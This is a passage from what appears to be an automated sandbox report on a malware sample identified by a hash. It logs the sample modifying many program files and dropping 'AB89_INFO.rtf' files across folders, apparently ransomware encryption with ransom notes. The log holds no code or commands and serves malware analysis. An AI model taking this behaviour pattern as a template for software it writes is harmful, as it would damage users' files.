modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.addons.swt.nl_zh_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+9 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-io-ui.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.nl_ja_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\nbexec64.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Cancun 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\stopNetworkServer 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\org-openide-util.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-progress_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\setEmbeddedCP.bat 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.alert_5.5.0.165303.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-selector-ui.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\klist.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Blanc-Sablon 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.commands_3.6.100.v20140528-1422.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\WidevineCdm\_platform_specific\win_x64\widevinecdm.dll.sig 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.text.nl_zh_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\mobile_view.html 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\ar.pak 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\zu\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\bg.pak 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\CST6 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Norfolk 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.extensionlocation.nl_zh_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Jamaica 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\UTC 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\skins\default.vlt 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ui.ja_5.5.0.165303.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\bs\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Sao_Paulo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ps\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.ja_5.5.0.165303\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Singapore 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.extensionlocation_1.2.100.v20131119-0908.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\management-agent.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\startNetworkServer.bat 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-oql_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\prodicon.gif 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Stockholm 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Mozilla Maintenance Service\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\ko.pak 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\jvm.hprof.txt 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\PMP\DataMatrix.pmp 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\GroupDismount.xlt 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\PST8PDT 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-applemenu_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\resources.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\charsets.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\sk\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Windows Journal\en-US\jnwmon.dll.mui 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Mozilla Maintenance Service\updater.ini 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\wa\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Kiev 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\nl\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Casablanca 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Hong_Kong 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\http.luac 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\epl-v10.html 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jmx_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.contexts_1.3.100.v20140407-1019.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.services_1.1.0.v20140328-1925.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+4 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\THIRDPARTYLICENSEREADME.txt 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\eclipse_update_120.jpg 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-profiling_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Moscow 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\elevation_service.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\DumontDUrville 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\ffjcext.zip 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\ext\access-bridge-64.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-6 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Berlin 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\PMP\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\db\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\sr\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-annotations-common_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.util_1.0.500.v20130404-1337.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Juneau 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\A3DUtility.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_zh_TW.properties 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jre7\lib\zi\Antarctica\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64.nl_ja_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-api.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Algiers 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\La_Rioja 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.net.nl_zh_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\ktab.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.garbagecollector.nl_ja_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Tucuman 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Guadalcanal 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\rmiregistry.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-text_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.ui_5.5.0.165303.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.net_1.2.200.v20120807-0927.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Bangkok 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\eu\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\lv\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.greychartplugin_5.5.0.165303.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\SettingsInternal.zip 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\da.pak 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-12 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-editor-mimelookup_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\El_Aaiun 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\msjet.xsl 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\ga\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Dubai 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\EET 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.emf.ecore_2.10.1.v20140901-1043.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.property.nl_ja_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.base.nl_zh_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Fortaleza 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Chuuk 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Kiritimati 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.nl_zh_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Thimphu 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-progress_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\tnameserv.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Paramaribo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\META-INF\MANIFEST.MF 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host-views_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-7 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\olh001.htm 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\license.html 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\bin\tnameserv.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Atlantic\Cape_Verde 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.renderers.swt_0.12.1.v20140903-1023.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-compat_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Eucla 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\management-agent.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\css\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\feedback.gif 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\org-netbeans-core_visualvm.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\rarrow.gif 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\lv\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.artifact.repository.nl_ja_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Martinique 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\SettingsInternal.zip 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\default_apps\gmail.crx 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jre7\lib\zi\America\Argentina\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\HST10 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-dialogs_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.RSA 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\create_stream.html 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\WindowsMedia.mpp 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64.nl_zh_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-common_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\playlist.json 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\gtkTSFrame.png 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Installer\chrmstp.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Matamoros 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\html\cpyr.htm 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\epl-v10.html 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\vlc-48.png 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification 